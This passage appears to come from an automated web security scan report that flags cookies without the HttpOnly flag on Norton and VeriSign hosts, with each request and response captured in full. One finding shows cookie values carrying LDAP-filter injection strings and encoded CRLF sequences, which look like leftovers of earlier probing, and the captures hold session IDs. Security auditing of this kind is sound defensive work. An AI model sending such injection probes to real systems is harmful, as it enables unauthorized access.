HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: Apache Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
10.31. http://us.norton.com/beta/index.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://us.norton.com
Path:
/beta/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Content-Length: 24280 Connection: closeSet-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title> <meta http-equiv="Content-Type" cont...[SNIP]...
10.32. http://us.norton.com/beta/overview.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://us.norton.com
Path:
/beta/overview.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beta/overview.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Content-Length: 0 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Connection: closeSet-Cookie: JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/
10.33. http://vipmobile.verisign.com/fpa/fpa.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/fpa/fpa.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fpa/fpa.jsp HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:52 GMT Server: ApacheSet-Cookie: JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa Content-Type: text/javascript Content-Length: 108420 var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://'); // Customizable variables var hostUri = urlProtocol + "vipmobile.verisign.com/fpa"; var cookieDomain = '.v...[SNIP]...
10.34. http://vipmobile.verisign.com/images/b_shadow.png
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/b_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/b_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"2822-1312807390000" Last-Modified: Mon, 08 Aug 2011 12:43:10 GMT Content-Length: 2822 Content-Type: image/png .PNG . ...IHDR.............8.e.... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.35. http://vipmobile.verisign.com/images/bl_shadow.png
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/bl_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/bl_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"3072-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 3072 Content-Type: image/png .PNG . ...IHDR... .........,l.6... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.36. http://vipmobile.verisign.com/images/br_shadow.png
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/br_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/br_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"3116-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 3116 Content-Type: image/png .PNG . ...IHDR.............!rlq... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.37. http://vipmobile.verisign.com/images/dot.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/dot.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dot.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"43-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,...........D..;
10.38. http://vipmobile.verisign.com/images/home_rght_box.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/home_rght_box.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home_rght_box.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"7996-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 7996 Content-Type: image/gif GIF89a7.A.................................................................................................................................................................................................[SNIP]...
10.39. http://vipmobile.verisign.com/images/r_shadow.png
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/r_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/r_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: ApacheSet-Cookie: JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"2817-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 2817 Content-Type: image/png .PNG . ...IHDR.............l.$"... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.40. http://vipmobile.verisign.com/images/rt_shadow.png
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/rt_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/rt_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:59 GMT Server: ApacheSet-Cookie: JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"3050-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 3050 Content-Type: image/png .PNG . ...IHDR....... ......+.l... pHYs............... OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,.. ...!.........{.k........>...........H3Q5...B............[SNIP]...
10.41. http://vipmobile.verisign.com/images/topleft.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/topleft.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/topleft.gif HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:59 GMT Server: ApacheSet-Cookie: JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"59-1312807394000" Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT Content-Length: 59 Content-Type: image/gif GIF89a.. ..........!.......,...... .......`y. d..Co.[.y...;
10.42. https://vipmobile.verisign.com/fpa/fpa.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://vipmobile.verisign.com
Path:
/fpa/fpa.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fpa/fpa.jsp HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:52:08 GMT Server: ApacheSet-Cookie: JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/javascript Content-Length: 108420 var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://'); // Customizable variables var hostUri = urlProtocol + "vipmobile.verisign.com/fpa"; var cookieDomain = '.v...[SNIP]...
10.43. http://buy.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:24 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=3bf0ac89-952a-4b3e-84b4-5a334e35934e1315604244143Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
10.44. http://buy.norton.com/ps
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
